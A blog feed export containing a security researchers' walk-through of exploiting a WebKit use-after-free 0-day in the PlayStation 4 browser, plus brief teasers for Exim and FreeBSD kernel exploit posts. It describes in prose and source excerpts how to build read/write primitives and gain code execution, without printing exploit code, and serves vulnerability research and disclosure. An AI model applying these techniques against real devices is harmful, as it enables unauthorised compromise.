Jekyll2021-11-04T15:14:31+00:00/feed.xml_cacaoThis is for the Pwners : Exploiting a WebKit 0-day in PlayStation 42020-12-11T08:52:43+00:002020-12-11T08:52:43+00:00/ps4,/exploit,/webkit/2020/12/11/this-is-for-the-pwners<p>Despite an active console hacking community, only few public PlayStation 4
exploits have been released. In this post, we will give a walk-through on the
exploitation of a 0-day WebKit vulnerability on 6.xx firmware. The exposed
WebKit-based browser is usually the entry point of a full-chain attack: from
browser exploitation to kernel exploitation. However, browser engine hardening
techniques together with the total absence of debugging capabilities makes it
very hard to successfully exploit bugs in the latest PS4 firmware.<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup></p>
<p>In this post, we will introduce the root cause of the bug. The bug provides
limited exploitation primitives. However, thanks to a weakness we identified in
ASLR mechanism, we were able to make this bug exploitable. We will focus on the
exploitation strategy we adopted and how we turned a non-trivial Use-After-Free
into a R/W primitive leading to code execution.</p>
<h2 id="attacking-the-ps4">Attacking the PS4</h2>
<p>The browser is probably the most common entry point to attack the PS4. The
browser is based on WebKit and runs in a sandbox. Unlike iOS devices, there is
no modern mitigation such as the Gigacage or the <code class="language-plaintext highlighter-rouge">StructureID</code> randomization and
JIT is not enabled.</p>
<p>A typical exploit chain starts with a WebKit exploit to get code execution in
the renderer process followed by a sandbox bypass to run a kernel exploit.</p>
<p>There have been a couple of WebKit vulnerabilities that have been successfully
exploited in the past. The bad-hoistexploit - by
<a href="https://twitter.com/Fire30_">@Fire30_</a> - is the last known public exploit on
the PS4. It exploits the vulnerability CVE-2018-4386 found by @lokihardt and
provides read/write primitives. The exploit works on firmware up to 6.72.</p>
<p>Another vulnerability found by @lokihardt (CVE-2018-4441) has been also
exploited on the PS4 by <a href="https://twitter.com/specterdev">@SpecterDev</a>. The
exploit provides also read/write primitives and works on firmware 6.20.</p>
<p>For older firmware (< 6.xx), there are some few exploits by
<a href="https://twitter.com/qwertyoruiopz">@qwertyoruiopz</a>,
<a href="https://twitter.com/specterdev">@SpecterDev</a>,
<a href="https://twitter.com/CTurtE">@CTurt</a>, …</p>
<p>Regarding kernel exploits, <a href="https://twitter.com/theflow0/">@theflow0</a> released
the last exploit in date. The exploit provides read/write primitives in the
kernel and is reachable from the WebKit sandbox. The bug is present on firmware
up to 7.02 and has been recently combined with the <code class="language-plaintext highlighter-rouge">bad-hoist</code> exploit to get a
full chain on 6.xx firmware.</p>
<p>Finally, there are some few vulnerabilities on BPF that have been discovered
and exploited by @qwertyoruiopz.</p>
<p>We strongly encourage readers to take a look at the excellent
<a href="https://github.com/Cryptogenic/Exploit-Writeups">writeups</a> by
<a href="https://twitter.com/specterdev">@SpecterDev</a> and the <a href="http://cturt.github.io/ps4.html">blog
series</a>s on hacking the PS4 by
<a href="https://twitter.com/CTurtE">@CTurt</a>.</p>
<h2 id="webkit-heaps">WebKit heaps</h2>
<p>WebKit has many heap allocators:</p>
<ul>
<li><code class="language-plaintext highlighter-rouge">FastMalloc</code> is the standard allocator. It is used by many WebKit components ;</li>
<li><code class="language-plaintext highlighter-rouge">IsoHeap</code> is used by the DOM engine. Its purpose is to sort each allocation using their types to mitigate UAF vulnerability ;</li>
<li><code class="language-plaintext highlighter-rouge">Garbage Collector</code> is used by the JavaScript engine to allocate JavaScript objects ;</li>
<li><code class="language-plaintext highlighter-rouge">IsoSubspace</code> is also used by the JavaScript engine. Its purpose is the same as IsoHeap but it is used for a few objects ;</li>
<li><code class="language-plaintext highlighter-rouge">Gigacage</code> implements mitigations to prevent out-of-bound read/write on specific objects. As mentioned earlier, it is disabled on the PS4.</li>
</ul>
<h3 id="the-primary-heap-allocator">The primary heap allocator</h3>
<p>The primary heap is made of chunks that are split into <code class="language-plaintext highlighter-rouge">smallpages</code> (4 KB). A
small page serves allocations for same-sized objects that are stored into
<code class="language-plaintext highlighter-rouge">smalllines</code> (256 bytes).</p>
<p><img src="/images/ps4/heap.svg" alt="" width="600px" class="center" /></p>
<p>The primary heap allocator is, in essence, a bump allocator. Objects are
allocated using the <code class="language-plaintext highlighter-rouge">fastMalloc</code> primitive that simply does the following when
serving allocations using the fast path.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="o">--</span><span class="n">m_remaining</span><span class="p">;</span>
<span class="kt">char</span> <span class="o">*</span><span class="n">result</span> <span class="o">=</span> <span class="n">m_ptr</span><span class="p">;</span>
<span class="n">m_ptr</span> <span class="o">+=</span> <span class="n">m_size</span><span class="p">;</span>
<span class="k">return</span> <span class="n">result</span><span class="p">;</span></code></pre></figure>
<p>When the bump allocator is running out of available free object slots,
fastMalloc’s slow path is triggered in order to refill the bump allocator. The
allocator is refilled either from the cache (fast path) - namely the
<code class="language-plaintext highlighter-rouge">bumpRangeCache</code> - or from a newly allocated page (slow path). Regarding the slow
path, a page is picked up from the cache - namely the <code class="language-plaintext highlighter-rouge">lineCache</code> or retrieved
from the list of free pages maintained for each chunk. In case of a fragmented
page (e.g., page allocated from <code class="language-plaintext highlighter-rouge">lineCache</code>), the contiguous free lines are used
to refill the allocator. The rest of the free lines are used to fill the
<code class="language-plaintext highlighter-rouge">bumpRangeCache</code>.</p>
<p><img src="/images/ps4/heap-bump.svg" alt="" width="360px" class="center" /></p>
<p>When an objected is freed, it is not made immediately available for subsequent
allocations. It is inserted in a dedicated vector <code class="language-plaintext highlighter-rouge">m_objectLog</code> that is
processed in <code class="language-plaintext highlighter-rouge">Deallocator::processObjectLog</code> when it reaches its maximal
capacity (512) or while refilling the bump allocator through the slow path. The
role of the <code class="language-plaintext highlighter-rouge">processObjectLog</code> is to release a <code class="language-plaintext highlighter-rouge">smallLine</code> if it’s refcount
reaches 0 (e.g., all slot objects in the smallLine are not used). When a
<code class="language-plaintext highlighter-rouge">smallLine</code> is released, it’s associated page is pushed into the <code class="language-plaintext highlighter-rouge">cacheLine</code>.
Note that <code class="language-plaintext highlighter-rouge">smallPages</code> and <code class="language-plaintext highlighter-rouge">chunks</code> are also refcounted and therefore released
when their respective refcount reaches 0.</p>
<h2 id="the-bug">The bug</h2>
<p>The bug has been triggered by our internal fuzzer. It is present in WebKit DOM
engine. More precisely the bug is present in
<code class="language-plaintext highlighter-rouge">WebCore::ValidationMessage::buildBubbleTree</code> method:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="n">ValidationMessage</span><span class="o">::</span><span class="n">buildBubbleTree</span><span class="p">()</span>
<span class="p">{</span>
<span class="cm">/* ... */</span>
<span class="k">auto</span> <span class="n">weakElement</span> <span class="o">=</span> <span class="n">makeWeakPtr</span><span class="p">(</span><span class="o">*</span><span class="n">m_element</span><span class="p">);</span> <span class="c1">// [1] flawed weak pointer </span>
<span class="n">document</span><span class="p">.</span><span class="n">updateLayout</span><span class="p">();</span> <span class="c1">// [2] call user registered JS events</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">weakElement</span> <span class="o">||</span> <span class="o">!</span><span class="n">m_element</span><span class="o">-></span><span class="n">renderer</span><span class="p">())</span>
<span class="k">return</span><span class="p">;</span>
<span class="n">adjustBubblePosition</span><span class="p">(</span><span class="n">m_element</span><span class="o">-></span><span class="n">renderer</span><span class="p">()</span><span class="o">-></span><span class="n">absoluteBoundingBoxRect</span><span class="p">(),</span> <span class="n">m_bubble</span><span class="p">.</span><span class="n">get</span><span class="p">());</span>
<span class="cm">/* ... */</span>
<span class="p">}</span></code></pre></figure>
<p>The method <code class="language-plaintext highlighter-rouge">buildBubbleTree</code> makes a call to update the layout during which all
user registered JS handlers are executed. If the <code class="language-plaintext highlighter-rouge">ValidationMessage</code> is destroyed
in a JS callback, this could lead to a Use-After-Free situation when we get
back to <code class="language-plaintext highlighter-rouge">buildBubbleTree</code> code.</p>
<p>The WebKit developers have identified that problems may arise while updating
the style or the layout. However, they failed to fix the code due to an extra
dereference while making a weak pointer. That is, we can still destroy the
<code class="language-plaintext highlighter-rouge">ValidationMessage</code> instance during a layout update.</p>
<p><img src="/images/ps4/vuln-bad-fix.png" alt="" width="500px" class="center" /></p>
<p>Hereafter is the fix after the reporting of the vulnerability:</p>
<figure class="highlight"><pre><code class="language-diff" data-lang="diff"><span class="p">void ValidationMessage::buildBubbleTree()
</span><span class="err">{</span>
/* ... */
<span class="gd">-
- auto weakElement = makeWeakPtr(*m_element);
-
- document.updateLayout();
-
- if (!weakElement || !m_element->renderer())
- return;
-
- adjustBubblePosition(m_element->renderer()->absoluteBoundingBoxRect(), m_bubble.get());
</span>
/* ... */
<span class="gi">+ if (!document.view())
+ return;
+ document.view()->queuePostLayoutCallback([weakThis = makeWeakPtr(*this)] {
+ if (!weakThis)
+ return;
+ weakThis->adjustBubblePosition();
+ });
</span><span class="err">}</span></code></pre></figure>
<h3 id="triggering-the-bug">Triggering the bug</h3>
<p>The following figure summarizes the vulnerable path. We can instantiate a
<code class="language-plaintext highlighter-rouge">ValidationMessage</code> object by invoking <code class="language-plaintext highlighter-rouge">reportValidity</code> on some HTML input
field. We register on that input field a JS handler. For instance, we can
define a JS handler that is executed whenever the focus is set on the input
field.</p>
<p><img src="/images/ps4/exploit-workflow.svg" alt="" width="500px" class="center" /></p>
<p>The <code class="language-plaintext highlighter-rouge">reportValidity</code> methods fire-up a timer to call the vulnerable function
<code class="language-plaintext highlighter-rouge">buildBubbleTree</code>. If we set the focus on the HTML input field before timer
expiration, <code class="language-plaintext highlighter-rouge">buildBubbleTree</code> will execute our JS handler during the layout
update. If the <code class="language-plaintext highlighter-rouge">ValidationMessage</code> is destroyed in the JS callback, this leads
to a UAF when getting back to <code class="language-plaintext highlighter-rouge">buildBubbleTree</code> code.</p>
<p>Now, if we manage somehow to survive to early crashes due to invalid access to
<code class="language-plaintext highlighter-rouge">ValidationMessage</code> fields, we end up calling <code class="language-plaintext highlighter-rouge">deleteBubbleTree</code> that will
destroy the <code class="language-plaintext highlighter-rouge">ValidationMessage</code> instance one more time.</p>
<p>Our first attempt to trigger the bug failed. <code class="language-plaintext highlighter-rouge">reportValidity</code> sets the focus on
the input field which triggers our JS callback too early. As a workaround, we
used two input fields: <code class="language-plaintext highlighter-rouge">input1</code> and <code class="language-plaintext highlighter-rouge">input2</code>. First, we register on the first
input a JS handler on focus event. Then, we invoke <code class="language-plaintext highlighter-rouge">reportVality</code> on <code class="language-plaintext highlighter-rouge">input1</code>.
This will trigger the execution of our JS handler that will simply set the
focus elsewhere (e.g., on <code class="language-plaintext highlighter-rouge">input2</code>). Finally, before <code class="language-plaintext highlighter-rouge">buildBubbleTree</code> gets
executed, we define a new handler on <code class="language-plaintext highlighter-rouge">input1</code> that will destroy the
<code class="language-plaintext highlighter-rouge">ValidationMessage</code> instance.</p>
<p><img src="/images/ps4/exploit-trigger_2.svg" alt="" width="600px" class="center" /></p>
<h3 id="debugging-the-bug">Debugging the bug</h3>
<p>Triggering the bug on the PS4 leads to a browser crash with zero debugging
information. To overcome this limitation, we have two options:</p>
<ol>
<li>
<p>Setup a debugging environment as close as possible to the PlayStation
environment. That is install a FreeBSD box and build WebKit from sources
downloaded from
<a href="https://doc.dl.playstation.net/doc/ps4-oss/webkit.html">doc.dl.playstation.net</a>.
This is helpful but sometimes an exploit which works on our environment does
not mean that it will work on the PS4.</p>
</li>
<li>
<p>Debug a 0-day vulnerability with a 1-day vulnerability. For that purpose, we
can use the <code class="language-plaintext highlighter-rouge">bad-hoist</code> exploit as it provides useful primitives such as the
read/write primitives but also the classical addrof/fakeobj primitives.
However, this exploit is not reliable and works only on firmware 6.xx. Also,
running this exploit prior to ours adds some noise on heap shaping.</p>
</li>
</ol>
<h3 id="anatomy-of-vulnerable-object">Anatomy of vulnerable object</h3>
<p>The <code class="language-plaintext highlighter-rouge">ValidationMessage</code> object is created by <code class="language-plaintext highlighter-rouge">reportValidity</code> and is mainly
accessed by <code class="language-plaintext highlighter-rouge">buildBubbleTree</code>. This object is fastmalloc’ed and is made of the
following fields.</p>
<p><img src="/images/ps4/validation-message.svg" alt="" width="5000px" class="center" /></p>
<p>The yellow fields are instantiated (<code class="language-plaintext highlighter-rouge">m_messageBody</code>, <code class="language-plaintext highlighter-rouge">m_messageHeading</code>) or gets
re-instantiated (<code class="language-plaintext highlighter-rouge">m_timer</code>) after a layout update. The green fields (<code class="language-plaintext highlighter-rouge">m_element</code>
and <code class="language-plaintext highlighter-rouge">m_bubble</code>) each points to a <code class="language-plaintext highlighter-rouge">HTMLElement</code> instance and are accessed after a
layout update.</p>
<p>The destruction of the <code class="language-plaintext highlighter-rouge">ValidationMessage</code> is done by the <code class="language-plaintext highlighter-rouge">deleteBubbleTree</code> method:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="n">ValidationMessage</span><span class="o">::</span><span class="n">deleteBubbleTree</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">m_bubble</span><span class="p">)</span> <span class="p">{</span>
<span class="n">m_messageHeading</span> <span class="o">=</span> <span class="n">nullptr</span><span class="p">;</span>
<span class="n">m_messageBody</span> <span class="o">=</span> <span class="n">nullptr</span><span class="p">;</span>
<span class="n">m_element</span><span class="o">-></span><span class="n">userAgentShadowRoot</span><span class="p">()</span><span class="o">-></span><span class="n">removeChild</span><span class="p">(</span><span class="o">*</span><span class="n">m_bubble</span><span class="p">);</span>
<span class="n">m_bubble</span> <span class="o">=</span> <span class="n">nullptr</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">m_message</span> <span class="o">=</span> <span class="n">String</span><span class="p">();</span>
<span class="p">}</span></code></pre></figure>
<p>This method clears most of the <code class="language-plaintext highlighter-rouge">ValidationMessage</code> fields (including
<code class="language-plaintext highlighter-rouge">m_bubble</code>) causing the browser to crash if it is invoked during a layout
updating. More precisely, the renderer process crashes in the function
<code class="language-plaintext highlighter-rouge">adjustBubblePosition</code> while attempting to dereference <code class="language-plaintext highlighter-rouge">m_bubble.get()</code>.</p>
<h3 id="surviving-an-inevitable-crash">Surviving an (inevitable) crash</h3>
<p>In order to exploit this vulnerability, we need either a memory leak or an ASLR
bypass. It turns out that we can allocate some objects at a predictable
location by spraying the heap. However, the exploitation of this weakness
requires a prior knowledge on memory mapping. We already have this for firmware
6.xx thanks to the bad-hoist exploit. The predicted address is theorically
bruteforcable on 7.xx firmware (more on this later).</p>
<p>Here’s how to avoid an early crash:</p>
<ol>
<li>
<p>Spray <code class="language-plaintext highlighter-rouge">HTMLElement</code> objects (e.g. <code class="language-plaintext highlighter-rouge">HTMLTextAreaElement</code>) → Objects allocated at
a fixed location.</p>
</li>
<li>
<p>Confuse ValidationMessage with a controlled object (e.g. <code class="language-plaintext highlighter-rouge">ArrayBuffer</code>’s
content).</p>
</li>
<li>
<p>Fix the <code class="language-plaintext highlighter-rouge">m_bubble</code> and <code class="language-plaintext highlighter-rouge">m_element</code> values so that they point to the address
that we predicted.</p>
</li>
</ol>
<p><img src="/images/ps4/crash-survive.svg" alt="" width="400px" class="center" /></p>
<h2 id="exploitation-strategy">Exploitation strategy</h2>
<h3 id="reusing-target-object">Reusing target object</h3>
<p>In order to reuse our target object, we proceed as depicted in the following figure:</p>
<ol>
<li>
<p>We spray the heap with objects <code class="language-plaintext highlighter-rouge">O</code> - having the same size as
<code class="language-plaintext highlighter-rouge">ValidationMessage</code> (48 bytes) - right before and after the allocation of our
target object.</p>
</li>
<li>
<p>We delete the ValidationMessage instance as well as the surrounding <code class="language-plaintext highlighter-rouge">O</code>
objects causing the <code class="language-plaintext highlighter-rouge">smallLine</code> holding those objects to be released and the
related <code class="language-plaintext highlighter-rouge">smallPage</code> to be cached.</p>
</li>
<li>
<p>We spray again the heap with objects having the same size as the target
object. In our exploit, we spray with <code class="language-plaintext highlighter-rouge">ArrayBuffer(48)</code> in order to override
<code class="language-plaintext highlighter-rouge">ValidationMessage</code> content with the <code class="language-plaintext highlighter-rouge">ArrayBuffer</code>’s content.</p>
</li>
</ol>
<p><img src="/images/ps4/heap-uaf.svg" alt="" width="540px" class="center" /></p>
<h3 id="initial-memory-leak">Initial memory leak</h3>
<p>As stated previously, some of the <code class="language-plaintext highlighter-rouge">ValidationMessage</code> are instantiated after
the layout update and therefore their content could be leaked. More precisely,
by simply dumping the content of the <code class="language-plaintext highlighter-rouge">ArrayBuffer</code>, we can leak the value of
<code class="language-plaintext highlighter-rouge">m_messageBody</code>, <code class="language-plaintext highlighter-rouge">m_messageHeading</code>, and <code class="language-plaintext highlighter-rouge">m_timer</code>. <code class="language-plaintext highlighter-rouge">m_timer</code> is particularly
interesting because it is fastMalloc’ed and hence allow us to infer the address
of objects allocated on the same <code class="language-plaintext highlighter-rouge">smallPage</code>.</p>
<h3 id="the-arbitrary-decrement-primitive">The arbitrary decrement primitive</h3>
<p>Now, if we use our target object properly, we end up calling the
<code class="language-plaintext highlighter-rouge">deleteBubbleTree</code> method that sets most of the <code class="language-plaintext highlighter-rouge">ValidationMessage</code> fields to a
NULL pointer value. It is important to note that NULL pointer assignment on
refcounted classes is overloaded and results in a refcount decrement. This
means that we have a refcount decrement on multiple controlled
<code class="language-plaintext highlighter-rouge">ValidationMessage</code>’s fields: <code class="language-plaintext highlighter-rouge">m_messageBody</code>, <code class="language-plaintext highlighter-rouge">m_messageHeading</code> and
<code class="language-plaintext highlighter-rouge">m_bubble</code>.</p>
<p>We can exploit the refcount decrement by corrupting for instance the
<code class="language-plaintext highlighter-rouge">m_messageHeading</code> pointer and confusing its refcount field with some object’s
length field. By targeting for example an object with a length and data field
such as the <code class="language-plaintext highlighter-rouge">StringImpl</code> object, the misaligned write on the length field would
allow us to read beyond the data limit.</p>
<p><img src="/images/ps4/exploit-decrement.svg" alt="" width="400px" class="center" /></p>
<p>In the following, we will exploit the arbitrary decrement primitive twice:</p>
<ol>
<li>
<p>The goal of the first run is to setup a relative read primitive in order to
leak the address of a <code class="language-plaintext highlighter-rouge">JSArrayBufferView</code>.</p>
</li>
<li>
<p>The goal of the second run is to setup a relative read/write primitive by
corrupting the length field of the previously leaked <code class="language-plaintext highlighter-rouge">JSArrayBufferView</code>
address.</p>
</li>
</ol>
<p>In the following, we will exploit the arbitrary decrement primitive twice:</p>
<ol>
<li>
<p>The goal of the first run is to set up a relative read primitive in order to
leak the address of a <code class="language-plaintext highlighter-rouge">JSArrayBufferView</code>.</p>
</li>
<li>
<p>The goal of the second run is to set up a relative read/write primitive by
corrupting the length field of the previously leaked <code class="language-plaintext highlighter-rouge">JSArrayBufferView</code>
address.</p>
</li>
</ol>
<p>The exploitation workflow is summarized in the following figure:</p>
<p><img src="/images/ps4/exploit-steps.png" alt="" width="360px" class="center" /></p>
<h3 id="the-relative-read-primitive">The relative read primitive</h3>
<p>The goal of this part is to leak the address of a <code class="language-plaintext highlighter-rouge">JSArrayBufferView</code> object.
This object is interesting from our point of view because it has a length field
and it allows to read/write arbitrary data into a data buffer. If we can
control the length field, then we can read/write beyond the limit of the data
buffer. This object is allocated using the Garbage Collector. As we don’t have
any leak of this heap, we can’t reach it using our arbitrary decrement
primitive.</p>
<p><code class="language-plaintext highlighter-rouge">StringImpl</code> is the JavaScript string representation. This object has a length
field and it allows reading data into a buffer. In JavaScript, strings are
immutable. This means that we can read but not write into the data buffer after
initializing it. The object is allocated using <code class="language-plaintext highlighter-rouge">fastMalloc</code> and the size of the
object is partially under our control. <code class="language-plaintext highlighter-rouge">StringImpl</code> are therefore a good target
to get a relative read primitive.</p>
<p>This is our strategy to overwrite the length of one <code class="language-plaintext highlighter-rouge">StringImpl</code> object:</p>
<ol>
<li>
<p>Spray multiple StringImpl objects before and after <code class="language-plaintext highlighter-rouge">m_timer</code> instantiation.
We allocate <code class="language-plaintext highlighter-rouge">StringImpl</code> such that they have the same size as a timer object in
order to ensure that <code class="language-plaintext highlighter-rouge">m_timer</code> and <code class="language-plaintext highlighter-rouge">StringImpl</code> reside on the same <code class="language-plaintext highlighter-rouge">smallPage</code>.</p>
</li>
<li>
<p>Exploit the arbitrary decrement primitive on the length field of one sprayed
<code class="language-plaintext highlighter-rouge">StringImpl</code>.</p>
</li>
<li>
<p>Iterate over the <code class="language-plaintext highlighter-rouge">StringImpl</code> objects and check which one has a corrupted
length (e.g., the one that has a huge length is the right one).</p>
</li>
</ol>
<p><img src="/images/ps4/exploit-read.svg" alt="" width="240px" class="center" /></p>
<p>Once we have our relative primitive through a corrupted <code class="language-plaintext highlighter-rouge">StringImpl</code>’s length
field, let’s see how we can get <code class="language-plaintext highlighter-rouge">JSArrayBufferView</code> references on the
<code class="language-plaintext highlighter-rouge">FastMalloc</code> heap.</p>
<p><code class="language-plaintext highlighter-rouge">Object.defineProperties</code> is a JavaScript built in that allows defining
JavaScript Object properties.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">static</span> <span class="n">JSValue</span> <span class="nf">defineProperties</span><span class="p">(</span><span class="n">ExecState</span><span class="o">*</span> <span class="n">exec</span><span class="p">,</span> <span class="n">JSObject</span><span class="o">*</span> <span class="n">object</span><span class="p">,</span> <span class="n">JSObject</span><span class="o">*</span> <span class="n">properties</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Vector</span><span class="o"><</span><span class="n">PropertyDescriptor</span><span class="o">></span> <span class="n">descriptors</span><span class="p">;</span>
<span class="n">MarkedArgumentBuffer</span> <span class="n">markBuffer</span><span class="p">;</span>
<span class="cm">/* ... */</span>
<span class="n">JSValue</span> <span class="n">prop</span> <span class="o">=</span> <span class="n">properties</span><span class="o">-></span><span class="n">get</span><span class="p">(</span><span class="n">exec</span><span class="p">,</span> <span class="n">propertyNames</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
<span class="cm">/* ... */</span>
<span class="n">PropertyDescriptor</span> <span class="n">descriptor</span><span class="p">;</span>
<span class="n">toPropertyDescriptor</span><span class="p">(</span><span class="n">exec</span><span class="p">,</span> <span class="n">prop</span><span class="p">,</span> <span class="n">descriptor</span><span class="p">);</span>
<span class="cm">/* ... */</span>
<span class="n">descriptors</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">descriptor</span><span class="p">);</span> <span class="c1">// [1] store JSValue reference on fastMalloc</span>
<span class="cm">/* ... */</span>
<span class="n">markBuffer</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">descriptor</span><span class="p">.</span><span class="n">value</span><span class="p">());</span> <span class="c1">// [2] store one more JSValue reference on fastMalloc</span>
<span class="p">}</span></code></pre></figure>
<p>In its implementation, this method uses two objects:</p>
<ul>
<li><code class="language-plaintext highlighter-rouge">Vector<PropertyDescriptor></code></li>
<li><code class="language-plaintext highlighter-rouge">MarkedArgumentBuffer</code></li>
</ul>
<p>Both objects have a backing buffer allocated using <code class="language-plaintext highlighter-rouge">fastMalloc</code> and both
objects are used by <code class="language-plaintext highlighter-rouge">defineProperties</code> to store <code class="language-plaintext highlighter-rouge">JSValue</code> references. A
<code class="language-plaintext highlighter-rouge">JSValue</code> is used by the JavaScript engine to represent many JavaScript values.
This object is interesting for us because it can be a <code class="language-plaintext highlighter-rouge">JSObject</code> reference
(e.g. <code class="language-plaintext highlighter-rouge">JSArrayBufferView</code>). Thus allowing us to push <code class="language-plaintext highlighter-rouge">JSObject</code> references on
<code class="language-plaintext highlighter-rouge">FastMalloc</code> heap. Using our <code class="language-plaintext highlighter-rouge">FastMalloc</code> relative read, we can find these
references.</p>
<p>This is the technique used by
<a href="https://twitter.com/qwertyoruiopz">@qwertyoruiopz</a>, to get <code class="language-plaintext highlighter-rouge">JSObject</code>
references on the <code class="language-plaintext highlighter-rouge">FastMalloc</code> heap:</p>
<ol>
<li>
<p>Allocate multiple i<code class="language-plaintext highlighter-rouge">JSArrayBufferView</code> objects.</p>
</li>
<li>
<p>Push references on <code class="language-plaintext highlighter-rouge">FastMalloc</code> heap using <code class="language-plaintext highlighter-rouge">Object.defineProperties</code>. The
references are freed but are not cleared when leaving
<code class="language-plaintext highlighter-rouge">Object.defineProperties</code>. We must be careful to not re-use these allocations
to avoid clearing the <code class="language-plaintext highlighter-rouge">JSValue</code> references.</p>
</li>
<li>
<p>Use the relative read to scan the <code class="language-plaintext highlighter-rouge">FastMalloc</code> heap and search for the
sprayed <code class="language-plaintext highlighter-rouge">JSArrayBufferView</code> references. The targeted reference must be
reachable from the relative read.</p>
</li>
</ol>
<p><img src="/images/ps4/exploit-find-view.svg" alt="" width="240px" class="center" /></p>
<h3 id="the-relative-readwrite-primitive">The relative read/write primitive</h3>
<p>With a <code class="language-plaintext highlighter-rouge">JSArrayBufferView</code> leak, we can easily get a relative read/write using
the following steps:</p>
<ol>
<li>
<p>Run the exploit again to re-use the arbitrary decrement primitive.</p>
</li>
<li>
<p>Use the arbitrary decrement to overwrite the <code class="language-plaintext highlighter-rouge">JSArrayBufferView</code>’s length
field. The overwritten <code class="language-plaintext highlighter-rouge">JSArrayBufferView</code> can be found by checking the length
of each sprayed object. The huge one is the right one.</p>
</li>
</ol>
<p>This reference can be used to read/write beyond the limit of the fastMalloc’ed
backing buffer.</p>
<p><img src="/images/ps4/exploit-write.svg" alt="" width="400px" class="center" /></p>
<h3 id="the-arbitrary-readwrite-primitive">The arbitrary read/write primitive</h3>
<p><code class="language-plaintext highlighter-rouge">JSArrayBufferView</code> object has a reference field to its data buffer. Corrupting
this reference enables an arbitrary read/write primitive.</p>
<p>We still have a relative read, the memory address of the relative read data
buffer and we know that the leaked <code class="language-plaintext highlighter-rouge">JSArrayBufferView</code> is reachable from the
relative read data buffer. We can easily find the memory location of the
relative read/write backing buffer thanks to the relative read.</p>
<p>Now, we can use the backing buffer reference to reach one of the sprayed
<code class="language-plaintext highlighter-rouge">JSArrayBufferView</code> using the relative read/write and corrupt the backing
buffer reference of another <code class="language-plaintext highlighter-rouge">JSArrayBufferView</code> object. This allows reading and
writing arbitrary data at an arbitrary address using the second
<code class="language-plaintext highlighter-rouge">JSArrayBufferView</code> reference as depicted by the following figure:</p>
<p><img src="/images/ps4/exploit-arbitrary.svg" alt="" width="640px" class="center" /></p>
<h3 id="code-execution">Code execution</h3>
<p>PS4 browser doesn’t allow allocating RWX memory pages. But with an arbitrary
R/W, we can control RIP register. For example, we can overwrite the vtable
pointer of one of our previously sprayed <code class="language-plaintext highlighter-rouge">HTMLTextAreaElement</code> making it points
to data that we control. Calling a JavaScript method on <code class="language-plaintext highlighter-rouge">HTMLTextAreaElement</code>
will result in a call to an address under our control. From there, we can do
code re-use (like ROP or JOP) to implement the next stage.</p>
<p>The exploit is available at <a href="https://github.com/synacktiv/PS4-webkit-exploit-6.XX">Synacktiv’s Github
repository</a>.</p>
<h2 id="porting-the-exploit-on-7xx-firmwares">Porting the exploit on 7.xx firmwares</h2>
<p>We managed to successfully exploit our bug on 6.xx firmware due to a weakness
on ASLR implementation that allowed us to predict the address of HTML objects.
The predictable address is hardcoded in the exploit and has been identified
thanks to the <code class="language-plaintext highlighter-rouge">bad-hoist</code> exploit. However, without a prior knowledge on memory
mapping, the only way to determine the address of our sprayed HTMLElement
objects is to brute force this address.</p>
<p>Brute forcing on the PS4 is tedious as the browser requires a user interaction
in order to restart. Our idea is to plug a Raspberry Pi that acts as a keyboard
on the PS4. Its main goal is to hit enter at periodical time (5s) to restart
the browser after the crash. The brute forced address is updated at each
attempt and stored in a cookie.</p>
<p><img src="/images/ps4/aslr.jpg" alt="" width="500px" class="center" /></p>
<p>Unfortunately, we didn’t get any result so far. We probably haven’t run the
brute force for a long enough period of time to cover the entire address space.</p>
<div class="footnotes" role="doc-endnotes">
<ol>
<li id="fn:1" role="doc-endnote">
<p>This blogpost entry is co-authored with <a href="https://twitter.com/0xdagger">@0xdagger</a>. The original post is hosted at <a href="https://www.synacktiv.com/publications/this-is-for-the-pwners-exploiting-a-webkit-0-day-in-playstation-4.html">Synacktiv website</a>. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
</ol>
</div>Despite an active console hacking community, only few public PlayStation 4 exploits have been released. In this post, we will give a walk-through on the exploitation of a 0-day WebKit vulnerability on 6.xx firmware. The exposed WebKit-based browser is usually the entry point of a full-chain attack: from browser exploitation to kernel exploitation. However, browser engine hardening techniques together with the total absence of debugging capabilities makes it very hard to successfully exploit bugs in the latest PS4 firmware.1 This blogpost entry is co-authored with @0xdagger. The original post is hosted at Synacktiv website. ↩Scraps of notes on exploiting Exim vulnerabilities2019-10-08T08:37:22+00:002019-10-08T08:37:22+00:00/exploit,/exim/2019/10/08/scraps-of-notes-on-exploiting-exim-vulnerabilities<p>Recently, Qualys published an advisory about a severe vulnerability impacting
Exim MTA: CVE-2019-15846. In their report, they even claim that they do have a
PoC granting a remote attacker root privileges. The report was followed by
instant alarmist articles: “Millions of Exim servers vulnerable to …”</p>
<p><a href="https://www.synacktiv.com/publications/scraps-of-notes-on-exploiting-exim-vulnerabilities.html">Read the full post
here</a></p>Recently, Qualys published an advisory about a severe vulnerability impacting Exim MTA: CVE-2019-15846. In their report, they even claim that they do have a PoC granting a remote attacker root privileges. The report was followed by instant alarmist articles: “Millions of Exim servers vulnerable to …”Exploiting a no-name FreeBSD kernel vulnerability2019-07-24T09:50:22+00:002019-07-24T09:50:22+00:00/exploit,/kernel,/freebsd/2019/07/24/exploiting-a-no-name-freebsd-kernel-vulnerability<p>A new patch has been recently shipped in FreeBSD kernels to fix a vulnerability
(cve-2019-5602) present in the cdrom device. In this post, we will introduce
the bug and discuss its exploitation on pre/post-SMEP FreeBSD revisions.</p>
<p><a href="https://www.synacktiv.com/publications/exploiting-a-no-name-freebsd-kernel-vulnerability.html">Read the full post
